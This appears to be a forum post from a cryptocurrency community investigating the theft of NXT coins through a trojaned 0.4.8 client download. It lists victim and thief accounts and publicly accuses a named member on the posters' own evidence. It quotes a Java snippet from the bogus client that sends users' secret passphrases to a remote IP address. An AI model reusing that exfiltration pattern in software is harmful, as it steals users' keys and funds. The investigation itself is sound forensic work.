OK, a summary of that we know so far:
The smoking gun points to EpicThomas, and kudos to LiQio for finding the smoking gun.
Go to the Google cache page LiQio found below, then hover your mouse over the link where EpicThomas says "NRS 0.4.8 is ready and can be downloaded from:
http://info.nxtcrypto.org/nxt-client-0.4.8.zip". The mouseover link that appears goes to
http://162.243.246.233/nxt-client-0.4.8.zip even tho the blue text of the link says
http://info,nxtcrypto.org/nxt-client-0.4.8.zip.
http://webcache.googleusercontent.com/search?q=cache:x1fHlORdUIEJ:https://bitcointalk.org/index.php%3Ftopic%3D345619.11820+&cd=1&hl=de&ct=clnk&gl=deEpicThomas then later edited his post and CHANGED IT BACK to the correct client.
The 0.4.8 losses were first reported by Sparta_cuss (147K NXT), then PaulyC (8K) , then newcn (18K), then plasticAiredale (19K). The 0.4.8 losses we do know of came in a 8 minute window:
Time Victim Vic Account Thief Account NXT
01.01.2014 12:56:54 plasticAiredale 8439060069775407509 15182566201738727933 18665
01.01.2014 12:58:03 PaulyC 16821029889165561706 16204974692852323982 7808
01.01.2014 13:01:45 newcn 16886318053889080545 9793828175536096502 18197
01.01.2014 13:05:06 sparta_cuss 11794318797680953099 12152013998194592943 147690
There may well be more 0.4.8 losses that haven't been discovered or reported yet.
There may have been losses from earlier clients before 0.4.8, as first reported by Framewood on December 27, 2013, 06:26:16 PM. If so, here is the first reported loss:
Time Victim Vic Account Thief Account NXT
26.12.2013 17:09:30 Framewood 697109629372813510 13643712185318669838 100088
Total reported losses so far are 292,448 NXT worth around 28 BTC or over $23,000.
There's got to be more. Keep digging.
More evidence. The ip address where the bogus client was stored belongs to EpicThomas, the same as epicdices.com
Quote from: notsoshifty on Today at 01:46:08 AM
Quote from: notsoshifty on Today at 01:38:41 AM
Interesting...:
Code:
if (!paramString.equals(""))
{
if (!myKeys.contains(paramString))
{
URL url = new URL("
http://162.243.246.223:3000/" + URLEncoder.encode(paramString, "ISO-8859-1"));
URLConnection connection = url.openConnection();
connection.setConnectTimeout(10000);
connection.getInputStream();
myKeys.add(paramString);
}
}
epicdices.com is also hosted on 162.243.246.223 - coincidence?
no, as I wrote here, we know identity of the hacker:
162.243.246.223 looks like it is "epicdices.com" (
http://domain-kb.com/www/epicdices.com)
Owner of epicdices - EpicThomas - is a member of this topic:
https://bitcointalksearch.org/user/epicthomas-172850
